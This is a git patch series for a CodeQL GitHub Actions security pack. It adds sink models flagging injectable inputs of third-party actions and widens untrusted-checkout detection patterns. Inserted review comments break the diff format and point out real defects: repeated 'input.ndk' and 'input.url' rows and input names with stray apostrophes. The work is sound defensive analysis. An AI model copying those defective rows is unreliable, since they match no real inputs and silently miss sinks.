diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml new file mode 100644 index 00000000000..a18319954e3 --- /dev/null +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 3db3e9cf66c..f46c40a8f9c 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml new file mode 100644 index 00000000000..219de80c39e --- /dev/null +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml new file mode 100644 index 00000000000..dc3c2739e87 --- /dev/null +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-php", "*", "input.php-version", "command-injection"] 
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml
new file mode 100644
index 00000000000..30679750f13
--- /dev/null
+++ b/ql/lib/ext/nick-fields_retry.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"]
+ - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"]
+ - ["nick-fields/retry", "*", "input.command", "command-injection"]
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml
new file mode 100644
index 00000000000..c600e7a93b6
--- /dev/null
+++ b/ql/lib/ext/octokit_graphql-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["octokit/graphql-action", "*", "input.query", "request-forgery"]
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml
new file mode 100644
index 00000000000..ed9088c9f56
--- /dev/null
+++ b/ql/lib/ext/octokit_request-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["octokit/request-action", "*", "input.route", "request-forgery"]
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml
new file mode 100644
index 00000000000..988c3d5e674
--- /dev/null
+++ b/ql/lib/ext/olafurpg_setup-scala.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"]
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml
new file mode 100644
index 00000000000..91a3382348c
--- /dev/null
+++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml new file mode 100644 index 00000000000..d9d15dc94b2 --- /dev/null +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml new file mode 100644 index 00000000000..6bc0467692d --- /dev/null +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml new file mode 100644 index 00000000000..62dea47d818 --- /dev/null +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml new file mode 100644 index 00000000000..525d0199859 --- /dev/null +++ b/ql/lib/ext/py-actions_flake8.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection"] + - ["py-actions/flake8", "*", "input.path", "command-injection"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"] + - ["py-actions/flake8", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml new file mode 100644 index 00000000000..5aac0f89432 --- /dev/null +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml new file mode 100644 index 00000000000..d32c6509ad7 --- /dev/null +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml new file mode 100644 index 00000000000..c4ea326ecef --- /dev/null +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml 
@@ -0,0 +1,24 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml
new file mode 100644
index 00000000000..7213a39f992
--- /dev/null
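Review bot: In the reactivecircus/android-emulator-runner model the row `"input.sdcard-path-or-size'"` carries a stray apostrophe inside the input name, so it presumably never matches the action's real input and that sink is silently lost; it should read `"input.sdcard-path-or-size"`. The same typo appears in the tripss/conventional-changelog-action hunk as `"input.tag-prefix'"`. This hunk also lists `input.ndk` seven times, which looks like placeholder rows for inputs that were meant to be modelled, and the veracode/veracode-sca hunk repeats `input.url` in the same way; each duplicate should be replaced by the intended input name or dropped. A row that cannot match is a false negative in the injection queries, so these are worth checking against each action's `action.yml`.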
+++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml new file mode 100644 index 00000000000..3207c6d7521 --- /dev/null +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml new file mode 100644 index 00000000000..d00d78bcba8 --- /dev/null +++ b/ql/lib/ext/roots_issue-closer-action.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml new file mode 100644 index 00000000000..e2813105bdc --- /dev/null +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 0190ffd9ad7..d6ba27a5079 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 87610c43440..413f4f3058b 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] 
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml new file mode 100644 index 00000000000..42361b203e0 --- /dev/null +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml new file mode 100644 index 00000000000..474b36186b0 --- /dev/null +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["snow-actions/eclint", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml new file mode 100644 index 00000000000..73b93dbb88a --- /dev/null +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml new file mode 100644 index 00000000000..4138b97f0fb --- /dev/null +++ b/ql/lib/ext/step-security_harden-runner.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml new file mode 100644 index 00000000000..1bcbac476a8 --- /dev/null +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tibdex/backport", "*", "input.body_template", "code-injection"] + - ["tibdex/backport", "*", "input.head_template", "code-injection"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection"] + - ["tibdex/backport", "*", "input.title_template", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 21a0b479ef5..7c681d8a64b 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -19,4 +19,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml new file mode 100644 index 00000000000..3072c6f54fd --- /dev/null +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml 
@@ -0,0 +1,15 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
new file mode 100644
index 00000000000..5fe53ea3d07
--- /dev/null
+++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"]
+ - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"]
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml
new file mode 100644
index 00000000000..5e87f6c3b94
--- /dev/null
+++ b/ql/lib/ext/veracode_veracode-sca.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.path", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
new file mode 100644
index 00000000000..dbe5d2d542d
--- /dev/null
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
new file mode 100644
index 00000000000..9ecbdb6329f
--- /dev/null
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
new file mode 100644
index 00000000000..10920eb6bf5
--- /dev/null
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml new file mode 100644 index 00000000000..a1d49af0845 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index d59cc07cad2..33d6260203e 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,7 +20,8 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") + externallyDefinedSink(this, + ["expression-injection", "command-injection", "request-forgery", "code-injection"]) } } From fe1bf58ae537271980678fc34b9237e5a27fc4a9 Mon Sep 17 00:00:00 2001 
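Review bot: `ExpressionInjectionSink` in `ExpressionInjection.ql` now accepts the model kinds `"command-injection"`, `"request-forgery"` and `"code-injection"` alongside `"expression-injection"`, so all four are reported by this one query under `Security/CWE-094` with the same alert text. A `request-forgery` sink (the octokit models added in this commit) is a different weakness with a different remediation, and triage gets harder when the alert does not say which kind matched. Consider keeping the kind visible, either with one sink class per kind or at least a comment above the call such as `// TODO: split per sink kind; request-forgery is not CWE-094`. The query's select clause is outside this hunk, so the message wording is an assumption.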
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:22:05 +0100 Subject: [PATCH 0097/1267] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index c9ad93d18b2..9ea69477675 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -37,6 +37,7 @@ predicate containsHeadRef(string s) { Utils::normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.issue\\.number\\b", // The pull request number on issue_comment. "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. @@ -82,7 +83,7 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent(["pull_request_target", "issue_comment", "workflow_run"]) and + w.hasTriggerEvent(["pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", "workflow_run", "check_run", "check_suite", "workflow_call"]) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check From aa37339deb22e8ac1d24e7305659342be3bac1a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:22:40 +0100 Subject: [PATCH 0098/1267] Apply suggestions from code review --- ql/lib/codeql/actions/Ast.qll | 1 - ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) 
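Review bot: The widened `hasTriggerEvent` list in the second `UntrustedCheckout.ql` hunk mixes triggers whose privilege level differs, and nothing in the code records why each one is there. `workflow_call` takes its permissions and secrets from the calling workflow, and `pull_request_review` / `pull_request_review_comment` runs for fork pull requests may receive a restricted token much like `pull_request` (worth confirming against the GitHub documentation), so these entries could raise alerts on workflows that are not actually privileged. Suggest moving the list into a named predicate with a one-line comment per trigger stating why it is treated as privileged, which also removes the over-long line. The `from … where` clause continues outside the hunk.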
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 143e89512fe..19d1924731a 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -5,7 +5,6 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - //[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-] expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index b05dd852dbf..9a97a1c45b4 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -47,7 +47,7 @@ private newtype TAstNode = ) ) or - // if's conditions do not need to be delimted with ${{}} + // `if`'s conditions do not need to be delimted with ${{}} exists(YamlMapping m | m.maps(key, value) and key.(YamlScalar).getValue() = ["if"] and From e726f9fff12fb35b5f0b1287aa87e0e1e5fb7136 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:24:32 +0100 Subject: [PATCH 0099/1267] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 9ea69477675..4a0a4b6ade6 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
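Review bot: The reworded comment in the `ast/internal/Ast.qll` hunk still contains the typo "delimted"; since the line is being edited anyway, it should read "delimited". The surrounding `TAstNode` branch starts and ends outside the hunk, so only the comment line is in question here.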
@@ -48,6 +48,26 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. "\\benv\\.GITHUB_HEAD_REF\\b", + + "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + + "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + + "\\bgithub\\.event\\.check_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", ], _, _) ) } From 3e2dffce8be696ae9a22b6605192aca3f85c728b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:57:43 +0100 Subject: [PATCH 0100/1267] Rename ContextExpression to 